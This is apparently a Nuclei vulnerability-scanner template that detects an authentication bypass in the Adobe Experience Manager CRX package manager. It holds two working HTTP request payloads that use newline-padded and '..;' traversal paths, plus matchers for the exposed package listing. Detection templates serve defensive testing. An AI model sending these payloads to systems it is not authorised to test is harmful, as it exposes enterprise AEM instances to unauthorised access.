id: aem-crx-bypass

info:
  author: dhiyaneshDK
  name: AEM CRX Bypass
  severity: critical
  reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
  tags: aem

requests:
  - raw:
      - |
        GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
        Host: {{Hostname}}
        User-Agent: curl/123
        Referer: {{BaseURL}}
        Connection: close
        Accept-Encoding: gzip, deflate

      - |
        GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
        Host: {{Hostname}}
        User-Agent: curl/123
        Referer: {{BaseURL}}
        Connection: close
        Accept-Encoding: gzip, deflate

    matchers-condition: and
    matchers:
      - type: word
        part: body
        word:
          - 'buildCount'
          - 'downloadName'
          - 'acHandling'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200